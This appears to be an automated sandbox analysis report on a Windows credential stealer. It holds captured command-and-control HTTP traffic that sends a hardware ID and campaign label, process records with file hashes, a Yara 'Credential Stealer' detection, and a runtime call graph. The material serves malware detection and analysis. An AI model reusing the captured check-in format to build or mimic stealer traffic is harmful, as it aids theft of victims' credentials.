                                                                                                                              2024-12-18 12:50:09 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=071A6BC798D46C7BAC8923850305D13E
                                                                                                                              2024-12-18 12:50:11 UTC1037INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 18 Dec 2024 12:50:11 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=6dsjb133p76n43qucrms0i1s6h; expires=Sun, 13-Apr-2025 06:36:48 GMT; Max-Age=9999999; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ap%2FjHHfayKmLeStK9J6iigGTFnudjaD0EQGGnwCzkfaJuBDjMfnuFqaBN05N3XGbpWxfiQN%2B0Gj4JOn1EwNfpN2Tx2IKZOR05GqMxycvEQV8R4LYqhOjUbsShbCZaO6o1cn%2BS30v"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f3f46e9bfd40c76-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1545&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=984&delivery_rate=1889967&cwnd=151&unsent_bytes=0&cid=7cda979f76b6d58b&ts=2789&x=0"
                                                                                                                              2024-12-18 12:50:11 UTC54INData Raw: 33 30 0d 0a 47 44 55 79 46 4c 56 41 71 49 71 30 4f 68 5a 61 32 37 6f 41 43 48 73 77 32 45 70 6a 56 51 39 45 4d 55 4f 54 59 42 58 74 66 76 56 44 61 41 3d 3d 0d 0a
                                                                                                                              Data Ascii: 30GDUyFLVAqIq0OhZa27oACHsw2EpjVQ9EMUOTYBXtfvVDaA==
                                                                                                                              2024-12-18 12:50:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:07:49:41
                                                                                                                              Start date:18/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\random.exe.10.exe"
                                                                                                                              Imagebase:0xe90000
                                                                                                                              File size:776'832 bytes
                                                                                                                              MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:07:49:41
                                                                                                                              Start date:18/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:07:49:44
                                                                                                                              Start date:18/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\random.exe.10.exe"
                                                                                                                              Imagebase:0xe90000
                                                                                                                              File size:776'832 bytes
                                                                                                                              MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1611561835.0000000000E04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1611809499.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:4.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:0.6%
                                                                                                                                Signature Coverage:1.8%
                                                                                                                                Total number of Nodes:2000
                                                                                                                                Total number of Limit Nodes:22
                                                                                                                                execution_graph 13358 e957d0 13359 e957dc ___scrt_is_nonwritable_in_current_image 13358->13359 13385 e92baf 13359->13385 13361 e957e3 13362 e9593c 13361->13362 13370 e9580d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 13361->13370 13421 e95020 IsProcessorFeaturePresent 13362->13421 13364 e95943 13365 e95949 13364->13365 13425 e98bd6 13364->13425 13428 e98bec 13365->13428 13369 e9582c 13370->13369 13371 e958ad 13370->13371 13373 e958a6 13370->13373 13403 e9b145 13371->13403 13396 e98c20 13373->13396 13375 e958b3 13407 eb804b 13375->13407 13380 e958d8 13381 e958e1 13380->13381 13412 e98c02 13380->13412 13415 e92be8 13381->13415 13386 e92bb8 13385->13386 13431 e94c8c IsProcessorFeaturePresent 13386->13431 13390 e92bc9 13395 e92bcd 13390->13395 13441 e9867a 13390->13441 13393 e92be4 13393->13361 13395->13361 13397 e9cf0b ___scrt_is_nonwritable_in_current_image 13396->13397 13398 e98c36 std::_Lockit::_Lockit 13396->13398 13513 e9e783 GetLastError 13397->13513 13398->13371 13404 e9b153 13403->13404 13405 e9b14e 13403->13405 13404->13375 13886 e9b26e 13405->13886 14489 eb8000 GetModuleHandleA GetModuleFileNameA ExitProcess 13407->14489 13410 e94fcd GetModuleHandleW 13411 e94fd9 13410->13411 13411->13364 13411->13380 14492 e98d21 13412->14492 13416 e92bf4 13415->13416 13417 e92c0a 13416->13417 14563 e9868c 13416->14563 13417->13369 13419 e92c02 13420 e96188 ___scrt_uninitialize_crt 7 API calls 13419->13420 13420->13417 13422 e95036 __fread_nolock CallUnexpected 13421->13422 13423 e950e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13422->13423 13424 e95125 CallUnexpected 13423->13424 13424->13364 13426 e98d21 CallUnexpected 21 API calls 13425->13426 13427 e98be7 13426->13427 13427->13365 13429 e98d21 CallUnexpected 21 API calls 13428->13429 13430 e95951 13429->13430 13432 e92bc4 13431->13432 13433 e96169 13432->13433 13450 e9e1c6 13433->13450 13437 e9617a 13438 e96185 13437->13438 13464 e9e202 13437->13464 13438->13390 13440 e96172 13440->13390 13504 ea0815 13441->13504 13444 e96188 13445 e9619b 13444->13445 13446 e96191 13444->13446 13445->13395 13447 e9d297 ___vcrt_uninitialize_ptd 6 API calls 13446->13447 13448 e96196 13447->13448 13449 e9e202 ___vcrt_uninitialize_locks DeleteCriticalSection 13448->13449 13449->13445 13452 e9e1cf 13450->13452 13453 e9e1f8 13452->13453 13454 e9616e 13452->13454 13468 ea7e4b 13452->13468 13455 e9e202 ___vcrt_uninitialize_locks DeleteCriticalSection 13453->13455 13454->13440 13456 e9d264 13454->13456 13455->13454 13485 ea7d5c 13456->13485 13461 e9d294 13461->13437 13463 e9d279 13463->13437 13465 e9e20d 13464->13465 13467 e9e22c 13464->13467 13466 e9e217 DeleteCriticalSection 13465->13466 13466->13466 13466->13467 13467->13440 13473 ea7edd 13468->13473 13471 ea7e83 InitializeCriticalSectionAndSpinCount 13472 ea7e6e 13471->13472 13472->13452 13474 ea7efe 13473->13474 13475 ea7e65 13473->13475 13474->13475 13476 ea7f66 GetProcAddress 13474->13476 13478 ea7f57 13474->13478 13480 ea7e92 LoadLibraryExW 13474->13480 13475->13471 13475->13472 13476->13475 13478->13476 13479 ea7f5f FreeLibrary 13478->13479 13479->13476 13481 ea7ed9 13480->13481 13482 ea7ea9 GetLastError 13480->13482 13481->13474 13482->13481 13483 ea7eb4 ___vcrt_FlsGetValue 13482->13483 13483->13481 13484 ea7eca LoadLibraryExW 13483->13484 13484->13474 13486 ea7edd ___vcrt_FlsGetValue 5 API calls 13485->13486 13487 ea7d76 13486->13487 13488 ea7d8f TlsAlloc 13487->13488 13489 e9d26e 13487->13489 13489->13463 13490 ea7e0d 13489->13490 13491 ea7edd ___vcrt_FlsGetValue 5 API calls 13490->13491 13492 ea7e27 13491->13492 13493 ea7e42 TlsSetValue 13492->13493 13494 e9d287 13492->13494 13493->13494 13494->13461 13495 e9d297 13494->13495 13496 e9d2a7 13495->13496 13497 e9d2a1 13495->13497 13496->13463 13499 ea7d97 13497->13499 13500 ea7edd ___vcrt_FlsGetValue 5 API calls 13499->13500 13501 ea7db1 13500->13501 13502 ea7dc9 TlsFree 13501->13502 13503 ea7dbd 13501->13503 13502->13503 13503->13496 13505 ea0825 13504->13505 13506 e92bd6 13504->13506 13505->13506 13508 e9ff89 13505->13508 13506->13393 13506->13444 13510 e9ff90 13508->13510 13509 e9ffd3 GetStdHandle 13509->13510 13510->13509 13511 ea0035 13510->13511 13512 e9ffe6 GetFileType 13510->13512 13511->13505 13512->13510 13514 e9e799 13513->13514 13515 e9e79f 13513->13515 13551 e9f19b 13514->13551 13518 e9e7a3 SetLastError 13515->13518 13556 e9f1da 13515->13556 13523 e9e838 13518->13523 13524 e9cf1c 13518->13524 13527 e9b9c2 CallUnexpected 37 API calls 13523->13527 13540 e9b9c2 13524->13540 13525 e9e7e9 13529 e9f1da __dosmaperr 6 API calls 13525->13529 13526 e9e7d8 13528 e9f1da __dosmaperr 6 API calls 13526->13528 13530 e9e83d 13527->13530 13531 e9e7e6 13528->13531 13532 e9e7f5 13529->13532 13568 e9e4f7 13531->13568 13533 e9e7f9 13532->13533 13534 e9e810 13532->13534 13535 e9f1da __dosmaperr 6 API calls 13533->13535 13574 e9ea94 13534->13574 13535->13531 13539 e9e4f7 ___free_lconv_mon 14 API calls 13539->13518 13775 ea08cc 13540->13775 13543 e9b9dc IsProcessorFeaturePresent 13545 e9b9e8 13543->13545 13805 e9b4b9 13545->13805 13546 e98bec CallUnexpected 21 API calls 13549 e9ba05 13546->13549 13547 e9b9d2 13547->13543 13550 e9b9fb 13547->13550 13550->13546 13579 e9f534 13551->13579 13553 e9f1b7 13554 e9f1c0 13553->13554 13555 e9f1d2 TlsGetValue 13553->13555 13554->13515 13557 e9f534 std::_Lockit::_Lockit 5 API calls 13556->13557 13558 e9f1f6 13557->13558 13559 e9e7bb 13558->13559 13560 e9f214 TlsSetValue 13558->13560 13559->13518 13561 e9f807 13559->13561 13566 e9f814 __dosmaperr 13561->13566 13562 e9f854 13596 e9ad6d 13562->13596 13563 e9f83f HeapAlloc 13565 e9e7d0 13563->13565 13563->13566 13565->13525 13565->13526 13566->13562 13566->13563 13593 e98f08 13566->13593 13569 e9e52c 13568->13569 13570 e9e502 HeapFree 13568->13570 13569->13518 13570->13569 13571 e9e517 GetLastError 13570->13571 13572 e9e524 __dosmaperr 13571->13572 13573 e9ad6d __dosmaperr 12 API calls 13572->13573 13573->13569 13633 e9ebfa 13574->13633 13580 e9f564 13579->13580 13584 e9f560 std::_Lockit::_Lockit 13579->13584 13580->13584 13585 e9f469 13580->13585 13583 e9f57e GetProcAddress 13583->13584 13584->13553 13591 e9f47a ___vcrt_FlsGetValue 13585->13591 13586 e9f510 13586->13583 13586->13584 13587 e9f498 LoadLibraryExW 13588 e9f4b3 GetLastError 13587->13588 13589 e9f517 13587->13589 13588->13591 13589->13586 13590 e9f529 FreeLibrary 13589->13590 13590->13586 13591->13586 13591->13587 13592 e9f4e6 LoadLibraryExW 13591->13592 13592->13589 13592->13591 13599 e98f43 13593->13599 13610 e9e8d4 GetLastError 13596->13610 13598 e9ad72 13598->13565 13600 e98f4f ___scrt_is_nonwritable_in_current_image 13599->13600 13605 e9b750 EnterCriticalSection 13600->13605 13602 e98f5a CallUnexpected 13606 e98f91 13602->13606 13605->13602 13609 e9b767 LeaveCriticalSection 13606->13609 13608 e98f13 13608->13566 13609->13608 13611 e9e8ea 13610->13611 13612 e9e8f0 13610->13612 13613 e9f19b __dosmaperr 6 API calls 13611->13613 13614 e9f1da __dosmaperr 6 API calls 13612->13614 13630 e9e8f4 SetLastError 13612->13630 13613->13612 13615 e9e90c 13614->13615 13617 e9f807 __dosmaperr 12 API calls 13615->13617 13615->13630 13618 e9e921 13617->13618 13619 e9e929 13618->13619 13620 e9e93a 13618->13620 13621 e9f1da __dosmaperr 6 API calls 13619->13621 13622 e9f1da __dosmaperr 6 API calls 13620->13622 13623 e9e937 13621->13623 13624 e9e946 13622->13624 13629 e9e4f7 ___free_lconv_mon 12 API calls 13623->13629 13625 e9e94a 13624->13625 13626 e9e961 13624->13626 13628 e9f1da __dosmaperr 6 API calls 13625->13628 13627 e9ea94 __dosmaperr 12 API calls 13626->13627 13631 e9e96c 13627->13631 13628->13623 13629->13630 13630->13598 13632 e9e4f7 ___free_lconv_mon 12 API calls 13631->13632 13632->13630 13634 e9ec06 ___scrt_is_nonwritable_in_current_image 13633->13634 13647 e9b750 EnterCriticalSection 13634->13647 13636 e9ec10 13648 e9ec40 13636->13648 13639 e9ec4c 13640 e9ec58 ___scrt_is_nonwritable_in_current_image 13639->13640 13652 e9b750 EnterCriticalSection 13640->13652 13642 e9ec62 13653 e9ea49 13642->13653 13644 e9ec7a 13657 e9ec9a 13644->13657 13647->13636 13651 e9b767 LeaveCriticalSection 13648->13651 13650 e9eb02 13650->13639 13651->13650 13652->13642 13654 e9ea7f __Getctype 13653->13654 13655 e9ea58 __Getctype 13653->13655 13654->13644 13655->13654 13660 ea1e7b 13655->13660 13774 e9b767 LeaveCriticalSection 13657->13774 13659 e9e81b 13659->13539 13662 ea1efb 13660->13662 13663 ea1e91 13660->13663 13664 e9e4f7 ___free_lconv_mon 14 API calls 13662->13664 13686 ea1f49 13662->13686 13663->13662 13668 e9e4f7 ___free_lconv_mon 14 API calls 13663->13668 13670 ea1ec4 13663->13670 13665 ea1f1d 13664->13665 13666 e9e4f7 ___free_lconv_mon 14 API calls 13665->13666 13671 ea1f30 13666->13671 13667 e9e4f7 ___free_lconv_mon 14 API calls 13672 ea1ef0 13667->13672 13674 ea1eb9 13668->13674 13669 ea1f57 13673 ea1fb7 13669->13673 13687 e9e4f7 14 API calls ___free_lconv_mon 13669->13687 13675 e9e4f7 ___free_lconv_mon 14 API calls 13670->13675 13685 ea1ee6 13670->13685 13676 e9e4f7 ___free_lconv_mon 14 API calls 13671->13676 13677 e9e4f7 ___free_lconv_mon 14 API calls 13672->13677 13678 e9e4f7 ___free_lconv_mon 14 API calls 13673->13678 13688 ea12dd 13674->13688 13680 ea1edb 13675->13680 13681 ea1f3e 13676->13681 13677->13662 13682 ea1fbd 13678->13682 13716 ea15f8 13680->13716 13684 e9e4f7 ___free_lconv_mon 14 API calls 13681->13684 13682->13654 13684->13686 13685->13667 13728 ea2015 13686->13728 13687->13669 13689 ea12ee 13688->13689 13715 ea13d7 13688->13715 13690 ea12ff 13689->13690 13691 e9e4f7 ___free_lconv_mon 14 API calls 13689->13691 13692 ea1311 13690->13692 13694 e9e4f7 ___free_lconv_mon 14 API calls 13690->13694 13691->13690 13693 ea1323 13692->13693 13695 e9e4f7 ___free_lconv_mon 14 API calls 13692->13695 13696 ea1335 13693->13696 13697 e9e4f7 ___free_lconv_mon 14 API calls 13693->13697 13694->13692 13695->13693 13698 ea1347 13696->13698 13699 e9e4f7 ___free_lconv_mon 14 API calls 13696->13699 13697->13696 13700 e9e4f7 ___free_lconv_mon 14 API calls 13698->13700 13702 ea1359 13698->13702 13699->13698 13700->13702 13701 e9e4f7 ___free_lconv_mon 14 API calls 13703 ea136b 13701->13703 13702->13701 13702->13703 13715->13670 13717 ea1605 13716->13717 13727 ea165d 13716->13727 13718 ea1615 13717->13718 13719 e9e4f7 ___free_lconv_mon 14 API calls 13717->13719 13720 e9e4f7 ___free_lconv_mon 14 API calls 13718->13720 13722 ea1627 13718->13722 13719->13718 13720->13722 13721 ea1639 13724 ea164b 13721->13724 13725 e9e4f7 ___free_lconv_mon 14 API calls 13721->13725 13722->13721 13723 e9e4f7 ___free_lconv_mon 14 API calls 13722->13723 13723->13721 13726 e9e4f7 ___free_lconv_mon 14 API calls 13724->13726 13724->13727 13725->13724 13726->13727 13727->13685 13729 ea2022 13728->13729 13733 ea2041 13728->13733 13729->13733 13734 ea16dc 13729->13734 13732 e9e4f7 ___free_lconv_mon 14 API calls 13732->13733 13733->13669 13735 ea17ba 13734->13735 13736 ea16ed 13734->13736 13735->13732 13770 ea1a3c 13736->13770 13739 ea1a3c __Getctype 14 API calls 13740 ea1700 13739->13740 13741 ea1a3c __Getctype 14 API calls 13740->13741 13773 ea1a4e 13770->13773 13771 ea16f5 13771->13739 13772 e9e4f7 ___free_lconv_mon 14 API calls 13772->13773 13773->13771 13773->13772 13774->13659 13811 ea0b4f 13775->13811 13778 ea08f3 13779 ea08ff ___scrt_is_nonwritable_in_current_image 13778->13779 13780 e9e8d4 __dosmaperr 14 API calls 13779->13780 13781 ea094f 13779->13781 13784 ea0961 CallUnexpected 13779->13784 13789 ea0930 CallUnexpected 13779->13789 13780->13789 13782 e9ad6d __dosmaperr 14 API calls 13781->13782 13785 ea0954 13782->13785 13783 ea0939 13783->13547 13786 ea0997 CallUnexpected 13784->13786 13825 e9b750 EnterCriticalSection 13784->13825 13822 e9b458 13785->13822 13791 ea0ad1 13786->13791 13792 ea09d4 13786->13792 13802 ea0a02 13786->13802 13789->13781 13789->13783 13789->13784 13794 ea0adc 13791->13794 13830 e9b767 LeaveCriticalSection 13791->13830 13798 e9e783 _unexpected 39 API calls 13792->13798 13792->13802 13795 e98bec CallUnexpected 21 API calls 13794->13795 13797 ea0ae4 13795->13797 13800 ea09f7 13798->13800 13799 e9e783 _unexpected 39 API calls 13803 ea0a57 13799->13803 13801 e9e783 _unexpected 39 API calls 13800->13801 13801->13802 13826 ea0a7d 13802->13826 13803->13783 13804 e9e783 _unexpected 39 API calls 13803->13804 13804->13783 13806 e9b4d5 __fread_nolock CallUnexpected 13805->13806 13807 e9b501 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13806->13807 13810 e9b5d2 CallUnexpected 13807->13810 13809 e9b5f0 13809->13550 13878 e929c6 13810->13878 13812 ea0b5b ___scrt_is_nonwritable_in_current_image 13811->13812 13817 e9b750 EnterCriticalSection 13812->13817 13814 ea0b69 13818 ea0bab 13814->13818 13817->13814 13821 e9b767 LeaveCriticalSection 13818->13821 13820 e9b9c7 13820->13547 13820->13778 13821->13820 13831 e9b6a7 13822->13831 13824 e9b464 13824->13783 13825->13786 13827 ea0a49 13826->13827 13828 ea0a81 13826->13828 13827->13783 13827->13799 13827->13803 13877 e9b767 LeaveCriticalSection 13828->13877 13830->13794 13832 e9b6b9 _Fputc 13831->13832 13835 e9b601 13832->13835 13834 e9b6d1 _Fputc 13834->13824 13836 e9b611 13835->13836 13839 e9b618 13835->13839 13844 e98af0 GetLastError 13836->13844 13842 e9b626 13839->13842 13848 e9b67e 13839->13848 13840 e9b64d 13840->13842 13851 e9b485 IsProcessorFeaturePresent 13840->13851 13842->13834 13843 e9b67d 13845 e98b09 13844->13845 13855 e9e985 13845->13855 13849 e9b689 GetLastError SetLastError 13848->13849 13850 e9b6a2 13848->13850 13849->13840 13850->13840 13852 e9b491 13851->13852 13853 e9b4b9 CallUnexpected 8 API calls 13852->13853 13854 e9b4a6 GetCurrentProcess TerminateProcess 13853->13854 13854->13843 13856 e9e998 13855->13856 13857 e9e99e 13855->13857 13858 e9f19b __dosmaperr 6 API calls 13856->13858 13859 e9f1da __dosmaperr 6 API calls 13857->13859 13876 e98b25 SetLastError 13857->13876 13858->13857 13860 e9e9b8 13859->13860 13861 e9f807 __dosmaperr 14 API calls 13860->13861 13860->13876 13862 e9e9c8 13861->13862 13863 e9e9d0 13862->13863 13864 e9e9e5 13862->13864 13866 e9f1da __dosmaperr 6 API calls 13863->13866 13865 e9f1da __dosmaperr 6 API calls 13864->13865 13867 e9e9f1 13865->13867 13868 e9e9dc 13866->13868 13869 e9e9f5 13867->13869 13870 e9ea04 13867->13870 13871 e9e4f7 ___free_lconv_mon 14 API calls 13868->13871 13872 e9f1da __dosmaperr 6 API calls 13869->13872 13873 e9ea94 __dosmaperr 14 API calls 13870->13873 13871->13876 13872->13868 13874 e9ea0f 13873->13874 13875 e9e4f7 ___free_lconv_mon 14 API calls 13874->13875 13875->13876 13876->13839 13877->13827 13879 e929cf IsProcessorFeaturePresent 13878->13879 13880 e929ce 13878->13880 13882 e94b7e 13879->13882 13880->13809 13885 e94c64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13882->13885 13884 e94c61 13884->13809 13885->13884 13887 e9b277 13886->13887 13888 e9b28d 13886->13888 13887->13888 13892 e9b1af 13887->13892 13888->13404 13890 e9b284 13890->13888 13909 e9b37c 13890->13909 13893 e9b1b8 13892->13893 13894 e9b1bb 13892->13894 13893->13890 13918 ea004c 13894->13918 13899 e9b1d8 13945 e9b29a 13899->13945 13900 e9b1cc 13902 e9e4f7 ___free_lconv_mon 14 API calls 13900->13902 13904 e9b1d2 13902->13904 13904->13890 13905 e9e4f7 ___free_lconv_mon 14 API calls 13906 e9b1fc 13905->13906 13907 e9e4f7 ___free_lconv_mon 14 API calls 13906->13907 13908 e9b202 13907->13908 13908->13890 13910 e9b3ed 13909->13910 13915 e9b38b 13909->13915 13910->13888 13911 e9e641 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 13911->13915 13912 e9f807 __dosmaperr 14 API calls 13912->13915 13913 e9b3f1 13914 e9e4f7 ___free_lconv_mon 14 API calls 13913->13914 13914->13910 13915->13910 13915->13911 13915->13912 13915->13913 13917 e9e4f7 ___free_lconv_mon 14 API calls 13915->13917 14208 ea4926 13915->14208 13917->13915 13919 e9b1c1 13918->13919 13920 ea0055 13918->13920 13924 ea484f GetEnvironmentStringsW 13919->13924 13967 e9e83e 13920->13967 13925 e9b1c6 13924->13925 13926 ea4867 13924->13926 13925->13899 13925->13900 13927 e9e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13926->13927 13928 ea4884 13927->13928 13929 ea4899 13928->13929 13930 ea488e FreeEnvironmentStringsW 13928->13930 13931 e9e531 __fread_nolock 15 API calls 13929->13931 13930->13925 13932 ea48a0 13931->13932 13933 ea48a8 13932->13933 13934 ea48b9 13932->13934 13935 e9e4f7 ___free_lconv_mon 14 API calls 13933->13935 13936 e9e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13934->13936 13937 ea48ad FreeEnvironmentStringsW 13935->13937 13938 ea48c9 13936->13938 13937->13925 13939 ea48d8 13938->13939 13940 ea48d0 13938->13940 13942 e9e4f7 ___free_lconv_mon 14 API calls 13939->13942 13941 e9e4f7 ___free_lconv_mon 14 API calls 13940->13941 13943 ea48d6 FreeEnvironmentStringsW 13941->13943 13942->13943 13943->13925 13946 e9b2af 13945->13946 13947 e9f807 __dosmaperr 14 API calls 13946->13947 13948 e9b2d6 13947->13948 13949 e9b2de 13948->13949 13954 e9b2e8 13948->13954 13950 e9e4f7 ___free_lconv_mon 14 API calls 13949->13950 13951 e9b1df 13950->13951 13951->13905 13952 e9b345 13953 e9e4f7 ___free_lconv_mon 14 API calls 13952->13953 13953->13951 13954->13952 13954->13954 13955 e9f807 __dosmaperr 14 API calls 13954->13955 13956 e9b354 13954->13956 13961 e9b36f 13954->13961 13963 e9e4f7 ___free_lconv_mon 14 API calls 13954->13963 14193 e9e16c 13954->14193 13955->13954 14202 e9b23f 13956->14202 13960 e9e4f7 ___free_lconv_mon 14 API calls 13962 e9b361 13960->13962 13964 e9b485 __Getctype 11 API calls 13961->13964 13965 e9e4f7 ___free_lconv_mon 14 API calls 13962->13965 13963->13954 13966 e9b37b 13964->13966 13965->13951 13968 e9e849 13967->13968 13969 e9e84f 13967->13969 13971 e9f19b __dosmaperr 6 API calls 13968->13971 13970 e9f1da __dosmaperr 6 API calls 13969->13970 13989 e9e855 13969->13989 13972 e9e869 13970->13972 13971->13969 13973 e9f807 __dosmaperr 14 API calls 13972->13973 13972->13989 13975 e9e879 13973->13975 13974 e9b9c2 CallUnexpected 39 API calls 13976 e9e8d3 13974->13976 13977 e9e881 13975->13977 13978 e9e896 13975->13978 13980 e9f1da __dosmaperr 6 API calls 13977->13980 13979 e9f1da __dosmaperr 6 API calls 13978->13979 13981 e9e8a2 13979->13981 13982 e9e88d 13980->13982 13983 e9e8b5 13981->13983 13984 e9e8a6 13981->13984 13987 e9e4f7 ___free_lconv_mon 14 API calls 13982->13987 13986 e9ea94 __dosmaperr 14 API calls 13983->13986 13985 e9f1da __dosmaperr 6 API calls 13984->13985 13985->13982 13988 e9e8c0 13986->13988 13987->13989 13990 e9e4f7 ___free_lconv_mon 14 API calls 13988->13990 13989->13974 13991 e9e85a 13989->13991 13990->13991 13992 ea040d 13991->13992 13993 ea0437 13992->13993 14014 ea0299 13993->14014 13996 ea0450 13996->13919 13999 ea0469 14001 e9e4f7 ___free_lconv_mon 14 API calls 13999->14001 14000 ea0477 14028 ea0094 14000->14028 14001->13996 14004 ea04af 14005 e9ad6d __dosmaperr 14 API calls 14004->14005 14007 ea04b4 14005->14007 14006 ea04f6 14010 ea053f 14006->14010 14039 ea07c8 14006->14039 14008 e9e4f7 ___free_lconv_mon 14 API calls 14007->14008 14008->13996 14009 ea04ca 14009->14006 14012 e9e4f7 ___free_lconv_mon 14 API calls 14009->14012 14011 e9e4f7 ___free_lconv_mon 14 API calls 14010->14011 14011->13996 14012->14006 14047 e97e1a 14014->14047 14017 ea02ba GetOEMCP 14020 ea02e3 14017->14020 14018 ea02cc 14019 ea02d1 GetACP 14018->14019 14018->14020 14019->14020 14020->13996 14021 e9e531 14020->14021 14022 e9e56f 14021->14022 14023 e9e53f __dosmaperr 14021->14023 14025 e9ad6d __dosmaperr 14 API calls 14022->14025 14023->14022 14024 e9e55a RtlAllocateHeap 14023->14024 14027 e98f08 std::ios_base::_Init 2 API calls 14023->14027 14024->14023 14026 e9e56d 14024->14026 14025->14026 14026->13999 14026->14000 14027->14023 14029 ea0299 41 API calls 14028->14029 14030 ea00b4 14029->14030 14031 ea01b9 14030->14031 14032 ea00f1 IsValidCodePage 14030->14032 14038 ea010c __fread_nolock 14030->14038 14033 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14031->14033 14032->14031 14034 ea0103 14032->14034 14035 ea0297 14033->14035 14036 ea012c GetCPInfo 14034->14036 14034->14038 14035->14004 14035->14009 14036->14031 14036->14038 14087 ea0623 14038->14087 14040 ea07d4 ___scrt_is_nonwritable_in_current_image 14039->14040 14167 e9b750 EnterCriticalSection 14040->14167 14042 ea07de 14168 ea0562 14042->14168 14048 e97e38 14047->14048 14054 e97e31 14047->14054 14049 e9e783 _unexpected 39 API calls 14048->14049 14048->14054 14050 e97e59 14049->14050 14055 e9ed66 14050->14055 14054->14017 14054->14018 14056 e9ed79 14055->14056 14058 e97e6f 14055->14058 14056->14058 14063 ea2046 14056->14063 14059 e9ed93 14058->14059 14060 e9edbb 14059->14060 14061 e9eda6 14059->14061 14060->14054 14061->14060 14084 ea0039 14061->14084 14064 ea2052 ___scrt_is_nonwritable_in_current_image 14063->14064 14065 e9e783 _unexpected 39 API calls 14064->14065 14066 ea205b 14065->14066 14073 ea20a1 14066->14073 14076 e9b750 EnterCriticalSection 14066->14076 14068 ea2079 14077 ea20c7 14068->14077 14073->14058 14074 e9b9c2 CallUnexpected 39 API calls 14075 ea20c6 14074->14075 14076->14068 14078 ea208a 14077->14078 14079 ea20d5 __Getctype 14077->14079 14081 ea20a6 14078->14081 14079->14078 14080 ea1e7b __Getctype 14 API calls 14079->14080 14080->14078 14082 e9b767 std::_Lockit::~_Lockit LeaveCriticalSection 14081->14082 14083 ea209d 14082->14083 14083->14073 14083->14074 14085 e9e783 _unexpected 39 API calls 14084->14085 14086 ea003e 14085->14086 14086->14060 14088 ea064b GetCPInfo 14087->14088 14089 ea0714 14087->14089 14088->14089 14095 ea0663 14088->14095 14091 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14089->14091 14093 ea07c6 14091->14093 14093->14031 14098 e9faf3 14095->14098 14099 e97e1a __strnicoll 39 API calls 14098->14099 14100 e9fb13 14099->14100 14118 e9e57f 14100->14118 14102 e9fbcf 14105 e929c6 